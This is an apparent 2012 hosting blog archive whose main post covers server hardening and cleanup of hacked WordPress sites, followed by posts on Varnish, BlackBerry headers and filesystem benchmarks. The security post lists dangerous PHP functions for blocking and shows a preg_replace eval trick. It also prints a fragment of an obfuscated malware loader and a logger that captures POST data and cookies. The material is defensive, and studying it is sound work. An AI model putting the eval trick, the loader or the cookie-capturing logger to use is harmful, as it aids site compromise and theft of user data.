Archive for the ‘Web Infrastructure’ Category

Our best practices regarding a web hosting environment

Monday, July 9th, 2012

Over the years we’ve had to deal with persistent security scans from hosts around the world, verifying that our installations were secure. After witnessing a competitor implode this morning as the result of a hack, I’m putting this out as a few of our best practices when dealing with Virtual and Dedicated web hosting. He called, we cleaned up quite a bit, but, he’s got a lot of work to do. When I got the call, he was ready to close shop offering to let us clean up.

SSH

One of the worst offenders are the SSH bots that come in and try 60000 password combinations on your machine. Since SSH requires a secure handshake, it uses a bit of CPU. As a result, when you have 200 IP addresses on a machine and their script goes through sequentially, you’re dealing with 12 million authentication attempts.

The first thing we did was limit our machines to answer only on the primary IP address – which cut our exposure tremendously. You could move SSH to an alternate port. If you do move it, make sure to use a port number lower than 1024. Ports above 1024 can be started by unprivileged users and you don’t want someone to have crashed the SSH daemon using the OOM killer, and restarting their own. Accidentally accepting a new key when you log in under pressure results in a compromised account. Due to a number of issues, we left SSH answering on port 22, but, used IPRECENT to allow 6 connections from an IP address within a minute, or, the IP address would be blocked. With this method, an attacker could do a authentication request every 12 seconds and work around this, or, use multiple proxy servers, but, it is usually easier to just allow the automated scan to run, then, move on when you don’t find anything quickly enough.

/sbin/iptables -A INPUT -p tcp --dport ssh -i eth0 -m state --state NEW -m recent --set
/sbin/iptables -A INPUT -p tcp --dport ssh -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 6 -j DROP

Another possibility is using Fail2ban. Fail2ban can report back to a central server and works with numerous SSH daemon log format strings. Personally, I prefer IPRECENT for its ease of use for services without worrying about what daemon is running, and the fact that it is self-healing.

Depending on your client needs, you could also use port knocking. Port 22 is closed unless it receives two syn packets on two ports. Both an unlock and lock sequence can be added and it can be configured to add the IP you’re currently connecting from. Handy if you’re on the road and need to connect in, but, don’t want to leave your connection wide open.

POP3/IMAP

POP3 receives a ton of attempts – more so than IMAP, but, they are usually served by the same daemon. You can use the IPRECENT rule above to limit connections, but, some of the scan scripts are smart enough to pipeline requests. Adjust your daemon to return fails after 3 attempts without checking the backend and the scanner just gets a number of failed attempts.

Make sure you support TLS – possibly even disabling PLAINTEXT authentication as almost every email client out there should use SSL connections.

FTP

For a while, we limited FTP to the primary machine IP due to a number of scans. IPRECENT doesn’t work well here either as some FTP clients will try to open 10-50 connections to transfer data more quickly. Choosing a lightweight FTP daemon that has some protections built in makes a difference. You can also have only the primary IP answer and set up a CNAME of ftp.theirdomain.com to point to the hostname to avoid some confusion. FTP passes the data over the wire unencrypted and you should use FTP-SSL or, if possible FTPS. Most FTP client software understands both.

www

With SQL Injections, ZMeu scans and everyone trying to look for vulnerabilities and exploits, there are a number of things that can be done. The problem is, once they find a vulnerability, exploit code is usually left on the server. That code might run attacks against other machines, send spam or allow them a remote shell.

One method of finding out what is being executed without actually breaking things with Suhosin is to run in simulation mode with the following patch (around line 1600) in execute.c:

        } else if (SUHOSIN_G(func_blacklist) != NULL) {
                if (zend_hash_exists(SUHOSIN_G(func_blacklist), lcname, function_name_strlen+1)) {
                        suhosin_log(S_EXECUTOR, "function within blacklist called: %s()", lcname);
                      /*goto execute_internal_bailout;*/
                }
        }

You want to comment out the goto execute_internal_bailout; line so that it logs to syslog rather than actually breaking due to simulation mode not actually running as a simulation. This way, you can add commands in your blacklist, run in simulation mode and actually see what is being executed.

If you’ve never built it, untar it, phpize, ./configure, make (verify that it has built sanely), make install, modify the config file, restart apache, check the error log for segfaults, etc.

Some somewhat sane defaults:

suhosin.log.syslog.facility = 0
suhosin.simulation = on
suhosin.executor.func.blacklist = include,include_once,require_once,passthru,eval,system,popen,exec,shell_exec,preg_replace,mail
suhosin.log.syslog.facility = 5
suhosin.log.syslog.priority = 1

Why preg_replace

There are a number of ways to execute a command, but, PHP allows the e PCRE modifier which evals the result:

preg_replace("/.*/e","\x65\x76\x61\x6C\x28");

You can run mod_security, but, so many software developers have problems with it that the default .htaccess for many applications is to just disable mod_security altogether. It isn’t really security if it gets disabled.

One issue with WordPress is that it handles 404s but has to do a bit of work beforehand before it can determine if it is a 404. ZMeu scans multiple IP addresses and hammers away with a few thousand requests, most of which 404 when a WordPress site answers on the bare IP.

The quick solution to this is to create virtualhost entries for the bare IPs that point somewhere, i.e. a parking page.

#!/usr/bin/python

DEFAULT_PATH = '/var/www/uc'

import os

ips = os.popen('/sbin/ifconfig -a|grep "inet addr"|cut -f 2 -d ":"|cut -f 1 -d " "|grep -v 127.0.0.1')
for ip in ips:
    print """
<virtualhost %s:80>
ServerName %s
DocumentRoot %s
</virtualhost>""" % (ip.strip(), ip.strip(), DEFAULT_PATH)

Now, when ZMeu or any of the other scanners come along, rather than hammering away at a WordPress or Joomla site, they are handed a parking page and 404s can be handled more sanely. Briefly, this is due to the fact that ZMeu is scanning the IP without sending through hostnames in most cases. Once they start scanning using hostnames, this method won’t provide as much utility.

Another issue years ago was having DocumentRoot set to /var/www and having domains in /var/www/domain.com, /var/www/domainb.com. domain.com and domainb.com would have a /cgi-bin/ directory set with ScriptAlias, but, if you visited the machine on the bare IP that didn’t match a VirtualHost, they would then scan the DocumentRoot. Secure files saved in /cgi-bin/ that should have been executed, usually wouldn’t execute and would be handed back with a content-type: text/plain, exposing datafiles. Make sure DocumentRoot in the base configuration points to a directory that is not the parent of multiple domain directories.

.htaccess

I don’t know how this one started or why this ever happened, but, so many tools on the internet try to make creating an .htaccess to password protect your directory and they contain one fatal flaw. I covered this a bit more in depth in another post, but, briefly, in the .htaccess, the site is protected with the following:

AuthUserFile .htpasswd
AuthName "Protected Area"
AuthType Basic

<Limit GET POST>
require valid-user
</Limit>

Since the directory being protected is only protected against GET and POST requests, as long as they are using PHP to serve the pages, GETS will work. In fact, almost anything other than one of the two verbs will get results without having to be authenticated.

WordPress

One of the most popular pieces of software our clients use is WordPress followed by Joomla. Both have numerous updates throughout the year, bundling features with security patches which makes upgrading somewhat painful for people. A recent patch rolled in with 3.4 and 3.4.1 fixed security issues, but, broke a number of themes causing a bit of pain for clients. Joomla isn’t immune from this either and has made multiple security upgrades bundled with features that break backwards compatibility.

If you run multiple WordPress sites on a single machine, take a look at this post which contains code to upgrade WordPress sites from the command line.

Plugins are the second issue. WordPress and some plugins have bundled code, but, when that bundled code has a security update, the plugin that bundled it often doesn’t get updated. timthumb.php comes to mind as a plugin that we found in numerous plugins and had to do a little grep/awk magic to replace all of them. One plugin updated, but, overwrote timthumb.php with an exploitable version – causing all sorts of discontent.

SetUID versus www-data

I’ve got a much longer post regarding this. Suffice it to say that no one will ever agree one way or the other, but, I feel that limiting what a site is able to write to on the physical disk is better than allowing the webserver to write over the entire site. In the case of a WordPress site that is compromised, with www-data, they may only be able to write files to the theme directory or the upload directory, eliminating the ability to damage most of the rest of the site. Joomla however, leaves the FTP password in the clear in a config file. Once a Joomla site has been hacked that uses www-data mode, the FTP password has been exposed and can be used to modify the site.

Ok, so the site has been hacked, now what?

Restore backups and keep on running? Regrettably, that is what most hosting companies do. If you have done any of the above, particularly the Suhosin patch, you can look through the logs to see what was executed. Even code that is Zend Optimized will trigger a syslog entry so that you can at least see what may be happening. If you run in www-data mode, new .php files owned by www-data are potential suspects especially in directories that shouldn’t contain executable code. Over the years, I’ve attempted to get WordPress to disable .php execution in the /uploads directory to no avail. Since a remote exploit may allow them to save a file, a common dumping ground is the wp-content/uploads directory so that they can later have a remote shell. Sometimes, they’ll get creative and put a file in /wp-content/uploads/2012/05/blueberry.jpg.php if you have a file named blueberry.jpg.

There are a number of things to look for – modified times (though, sometimes hackers are resetting the timestamps on files to match other files in that directory), .php files where they shouldn’t be, etc. There are other tricks, sometimes they will modify .htaccess to run a .jpeg as .php, so, you can’t always depend on that. If they can’t upload a remote exploit, there is a possibility that they can upload a .jpg file that actually contains php code which can be remotely included from another exploited site. Since PHP doesn’t check the mime type on an include, exploit code could be sitting on your server.

Even mime type validation of uploads isn’t always enough.

Javascript exploits are some of the toughest to ferret out of a site. Viewing the source of a document usually results in the pre-rendered version, and if their exploit was snuck onto the end of jquery.1.7.min.js, the page can get modified after it has loaded. Firefox has a ‘View Generated Source’ option which makes it a little easier to track this down. Be prepared for some obfuscation as the code will sometimes be encrypted a bit. A Live Headers plugin can also give you a hostname to grep the contents of the site.

One of the trickier WordPress exploits was using wp_options _transient_feed_ variables to store exploit code. Cleaning that up was tricky to say the least, but, the code was gzipped, base64 encoded and stored as an option variable that was inserted into a plugin very cleanly.

Some of the code found in the template:

$z=get_option("_transient_feed_8130f985e7c4c2eda46e2cc91c38468d");
$z=base64_decode(str_rot13($z)); if(strpos($z,"2A0BBFB0")!==false){ 

and in wp_options:

| 2537 | 0 | _transient_feed_8130f985e7c4c2eda46e2cc91c38468d | s:50396:"nJLbVJEyMzyhMJDbWmWOZRWPExVjWlxcrj0XVPNtVROypaWipy9lMKOipaEcozpbZPx7VROcozyspzImqT9lMFtvp2SzMI9go2E

The trick to a cleanup is to be meticulous in your analysis. File dates, file ownership, what was changed, what logging has been done all have the ability to provide clues. Sometimes, you won’t be able to find the original exploit on the first runthrough and will have to install a bit more logging.

If you still don’t have a good idea, you can do something like this:

.htaccess:

include_path = ".:/var/www/php"
auto_prepend_file postlog.php

postlog.php

<?php

if ( (isset( $HTTP_RAW_POST_DATA ) || !empty( $_POST )) &&
     (strpos($_SERVER['REMOTE_ADDR'],'11.222.') === FALSE)
   ) {
// block out local IP addresses (monitoring, etc)

if ( !isset( $HTTP_RAW_POST_DATA ) ) {
$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}
 
  $buffer = "Date: " . date('M/d/Y H:i') . "\nSite: {$_SERVER[ 'HTTP_HOST' ]}\nURL: {$_SERVER[ 'REQUEST_URI' ]}\nPOST request from: {$_SERVER[ 'REMOTE_ADDR' ]}\n\nPOST DATA:: " . print_r( $_POST, 1 ) . "\nCOOKIES: " . print_r( $_COOKIE, 1 ) . "\nHTTP_RAW_POST_DATA: $HTTP_RAW_POST_DATA\nSERVER Data:" . print_r ($_SERVER, 1) . "\n----------\n" ;
  $tmp = explode('/',$_SERVER[ 'SCRIPT_NAME' ]);
  $fn = array_pop($tmp);

  $fh = fopen('/home/username/postlog/'.date('Ymd').'.'.$fn,'a+');
  fwrite($fh, $buffer);
  fclose($fh);
}
?>

What this will do is log every post request that is done and log it to a file. If the site gets exploited again, you have a forensic log that you can go back through.

The single biggest thing I can say is keep your applications updated. I know most webhosts don’t pay attention to what is running on their machines, but, it is usually easier to prevent things from breaking than to fix them after they’ve broken.

My competitor? They’re on hour 72 cleaning things up since they don’t maintain two generations of weekly backups.

Finally, a formal release for my WordPress + Varnish + ESI plugin

Tuesday, January 10th, 2012

A while back I wrote a plugin to take care of a particular client traffic problem. As the traffic came in very quickly and unexpectedly, I had only minutes to come up with a solution. As I knew Varnish pretty well, my initial reaction was to put the site behind Varnish. But, there’s a problem with Varnish and WordPress.

WordPress is a cookie monster. It uses and depends on cookies for almost everything – and Varnish doesn’t cache assets that contain cookies. VCL was modified and tweaked, but, the site was still having problems.

So, a plugin was born. Since I was familiar with ESI, I opted to write a quick plugin to cache the sidebar and the content would be handled by Varnish. On each request, Varnish would assemble the Edge Side Include and serve the page – saving the server from a meltdown.

The plugin was never really production ready, though, I have used it for a year or so when particular client needs came up. When Varnish released 3.0, ESI could work with GZipped/Deflated content which significantly increased the utility of the plugin.

If you would like to read a detailed explanation of how the plugin works and why, here’s the original presentation I gave in Florida.

You can find the plugin on WordPress’s plugin hosting at http://wordpress.org/extend/plugins/cd34-varnish-esi/.

Hey Blackberry, do you get paid for Bandwidth burned on data networks?

Thursday, January 5th, 2012

Requests from:

User-Agent: BlackBerry8530/5.0.0.886 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/105
Accept: application/vnd.rim.html,text/html,application/xhtml+xml,
application/vnd.wap.xhtml+xml,text/vnd.sun.j2me.app-descriptor,
image/vnd.rim.png,image/jpeg,application/xvnd.rim.pme.b,
application/vnd.rim.ucs,image/gif;anim=1,application/vnd.rim.jscriptc;
v=0-8-72,application/x-javascript,application/vnd.rim.css;v=2,text/css;
media=screen,application/vnd.wap.wmlc;q=0.9,application/vnd.wap.wmlscriptc;q=0.7,
text/vnd.wap.wml;q=0.7,*/*;q=0.5

We prefer a number of content-types, but, if worse comes to worse, we’ll accept everything anyhow.

440 bytes transmitted on EVERY request made from a Blackberry when you could have just done:

Accept: */*

and saved 428 bytes PER request.

This particular page had 97 assets, amounting to almost 32k in wasted bandwidth sending headers to the CDN.

Ext4, XFS and BtrFS benchmarks and testing

Tuesday, November 1st, 2011

Recently I talked about versioning filesystems available for OSS systems. While most of our server farms use XFS, we have been moving to Ext4 on a number of machines. This wasn’t done as a precursor to BtrFS but problems we’ve been having with XFS on very large filesystems. The fact that we can migrate Ext4 to BtrFS in-place is just a coincidental bonus.

While ZFS is still a consideration if we move to FreeBSD (I was not suitably impressed with Debian’s K*BSD project enough to consider it stable enough for production), I felt that looking at BtrFS might be worth a look. There is also CephFS but that requires a little more infrastructure as you need to run a cluster and it isn’t really made for single machine deployments.

We’re also going to make some assumptions and do things you might not want to do on a home system. Since the data center we’re in has a 100% power SLA, we can be sure that we won’t lose power and can be a little more aggressive. We disable atime which may negatively impact clients if you are dealing with a disk that handles your mailspool. Also, recent versions of XFS handle atime updates much differently, so, the performance boost from noatime is negligible.

Command used to test:

/usr/sbin/bonnie++ -s 8g -n 512

Ext4

mkfs -t ext4 /dev/sda5
mount -o noatime /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   332  99 54570  12 23512   5  1615  98 62905   6 131.8   3
Latency             24224us     471ms     370ms   13739us     110ms    5257ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512 24764  69 267757  98  2359   6 25084  67 388005  98  1403   3
Latency              1258ms    1402us   11767ms    1187ms      66us   11682ms

1.96,1.96,version,1,1320193244,8G,,332,99,54570,12,23512,5,1615,98,62905,6,131.8,3,512,,,,,24764,69,267757,98,2359,6,25084,67,388005,98,1403,3,24224us,471ms,370ms,13739us,110ms,5257ms,1258ms,1402us,11767ms,1187ms,66us,11682ms

Ext4 with journal conversion and mount options

mkfs -t ext4 /dev/sda5
tune2fs -o journal_data_writeback /dev/sda5
mount -o rw,noatime,data=writeback,barrier=0,nobh,commit=60 /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   335  99 53396  11 25240   6  1619  99 62724   6 130.9   5
Latency             23955us     380ms     231ms   15962us     143ms   16261ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512 24253  65 266963  98  2341   6 24567  65 389243  98  1392   3
Latency              1232ms    1405us   11500ms    1232ms     130us   11543ms

1.96,1.96,version,1,1320192213,8G,,335,99,53396,11,25240,6,1619,99,62724,6,130.9,5,512,,,,,24253,65,266963,98,2341,6,24567,65,389243,98,1392,3,23955us,380ms,231ms,15962us,143ms,16261ms,1232ms,1405us,11500ms,1232ms,130us,11543ms

XFS:

mount -t xfs -f /dev/sda5
mount -o noatime /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   558  98 55174   9 26660   6  1278  96 62598   6 131.4   5
Latency             14264us     227ms     253ms   77527us   85140us     773ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512  2468  19 386301  99  4311  25  2971  22 375624  99   546   3
Latency              1986ms     346us    1341ms    1580ms      82us    5904ms
1.96,1.96,version,1,1320194740,8G,,558,98,55174,9,26660,6,1278,96,62598,6,131.4,5,512,,,,,2468,19,386301,99,4311,25,2971,22,375624,99,546,3,14264us,227ms,253ms,77527us,85140us,773ms,1986ms,346us,1341ms,1580ms,82us,5904ms

XFS, mount options:

mkfs -t xfs -f /dev/sda5
mount -o noatime,logbsize=262144,logbufs=8 /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   563  98 55423   9 26710   6  1328  99 62650   6 129.5   5
Latency             14401us     345ms     298ms   20328us     119ms     357ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512  3454  26 385552 100  5966  35  4459  34 375917  99   571   3
Latency              1625ms     360us    1323ms    1243ms      67us    5060ms

1.96,1.96,version,1,1320196498,8G,,563,98,55423,9,26710,6,1328,99,62650,6,129.5,5,512,,,,,3454,26,385552,100,5966,35,4459,34,375917,99,571,3,14401us,345ms,298ms,20328us,119ms,357ms,1625ms,360us,1323ms,1243ms,67us,5060ms

XFS, file system creation options and mount options:

mkfs -t xfs -d agcount=32 -l size=64m -f /dev/sda5
mount -o noatime,logbsize=262144,logbufs=8 /dev/sda5 /mnt

Results:

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   561  97 54674   9 26502   6  1235  95 62613   6 131.4   5
Latency             14119us     346ms     247ms   94238us   76841us     697ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512  9576  73 383305 100 14398  85  9156  70 373557  99  2375  14
Latency              1110ms     375us     301ms     850ms      36us    5772ms
1.96,1.96,version,1,1320198613,8G,,561,97,54674,9,26502,6,1235,95,62613,6,131.4,5,512,,,,,9576,73,383305,100,14398,85,9156,70,373557,99,2375,14,14119us,346ms,247ms,94238us,76841us,697ms,1110ms,375us,301ms,850ms,36us,5772ms

BtrFS:

mkfs -t btrfs /dev/sda5
mount -o noatime /dev/sda5 /mnt

Also, make sure CONFIG_CRYPTO_CRC32C_INTEL is set in the kernel, or loaded as a module and use an Intel CPU.

Version  1.96       ------Sequential Output------ --Sequential Input- --Random-
Concurrency   1     -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine        Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
version          8G   254  99 54778   9 23070   8  1407  92 59932  13 131.2   5
Latency             31553us     264ms     826ms   94269us     180ms   17963ms
Version  1.96       ------Sequential Create------ --------Random Create--------
version             -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
              files  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
                512 17034  83 256486 100 13485  97 15282  76 38942  73  1472  23
Latency               126ms    2162us   11295us   71992us   20713us   28647ms

1.96,1.96,version,1,1320204006,8G,,254,99,54778,9,23070,8,1407,92,59932,13,131.2,5,512,,,,,17034,83,256486,100,13485,97,15282,76,38942,73,1472,23,31553us,264ms,826ms,94269us,180ms,17963ms,126ms,2162us,11295us,71992us,20713us,28647ms

Analysis

Ext4 is considerably better than Ext3 was last time we ran the check. Even with the allocation group tweaks and mount options we use, Ext4 isn’t a bad alternative and shows some improvements over XFS. However, BtrFS even with the Intel CRC hardware acceleration, the Random Create Read benchmark shows a significant drop.

I believe our recent conversion to Ext4 isn’t negatively impacting things based on the typical workload machines see.

I’ll continue to work with BtrFS and see if I can figure out why that one particular benchmark performs so poorly, but, some of the other options present in BtrFS since it is a versioning filesystem will be quite useful.

Machine specs:

* Linux version 3.1.0 #3 SMP Tue Nov 1 16:23:42 EDT 2011 i686 GNU/Linux
* P4/3.0ghz, 2gb RAM
* Western Digital SATA2 320gb 7200 RPM Drive

Versioning Filesystem choices using OSS

Tuesday, November 1st, 2011

One of the clusters we have uses DRBD between two machines with GFS2 mounted on DRBD in dual primary. I’d played around with Gluster and Lustre, OCFS2, AFS and many others and I’ve used NetApps in the past, but, I’ve never been extremely happy with any of the distributed and clustered filesystems.

With my recent thinking on SetUID mode or SetGID to deal with particular problems led me to look at a versioning filesystem. Currently that leaves ZFS and BtrFS.

I’ve used ZFS in the past on Solaris and it is supported natively within FreeBSD. Since we use Debian, there is Debian’s K*BSD project which puts the Debian userland on the BSD kernel – making most of our in-house management processes easy to convert. Using ZFS under Linux requires using Fuse which could introduce performance issues.

The other option we have is BtrFS. BtrFS is less mature, but, also has the ability to handle in-place migrations from ext3/ext4. While this doesn’t really help much since we primarily run XFS, future machines could use ext4 until BtrFS is deemed stable enough at which point they could be live converted.

In testing, XFS and Ext4 have similar performance when well tuned which means we shouldn’t see any real significant difference with either. Granted this disagrees with some current benchmarks, but, those benchmarks didn’t appear to set the filesystem up correctly and didn’t modify the mount parameters to allow for more buffers to be used. When dealing with small files, XFS needs a little more RAM and the journal logbuffers needs to be increased – keeping more of the log in RAM before being replayed and committed. Large file performance is usually deemed superior with XFS, but, properly tuning Ext3 (and by inference, Ext4), we can change the performance characteristics of Ext3/4 and get about 95% of XFS’s large file performance.

Currently we keep two generations of weekly machine backups. While this wouldn’t change, we actually could do checkpointing and more frequent snapshots so that a file uploaded and modified or deleted would have a much better chance of being able to be restored. One of the things about versioning filesystems is the ability to do hourly or daily snapshots which should allow us to reduce the data loss if a site is exploited or catastrophically damaged through a mistake.

So, we’ve got three potential solutions in order of confidence that the solution will work:

* FreeBSD ZFS
* Debian/K*BSD ZFS
* Debian BtrFS

This weekend I’ll start putting the two Debian solutions through their paces to see if I feel comfortable with either. I’ve got a chassis swap to do this week and we’ll probably switch that machine from XFS to Ext4 in preparation as well. Most of the new machines we’ve been putting online now use Ext4 due to some of the issues I’ve had with XFS.

Ideally, I would like to start using BtrFS on every machine, but, if I need to move things over to FreeBSD, I would have to make some very tough decisions and migrations.

Never a dull moment.

Entries (RSS) and Comments (RSS).
Cluster host: li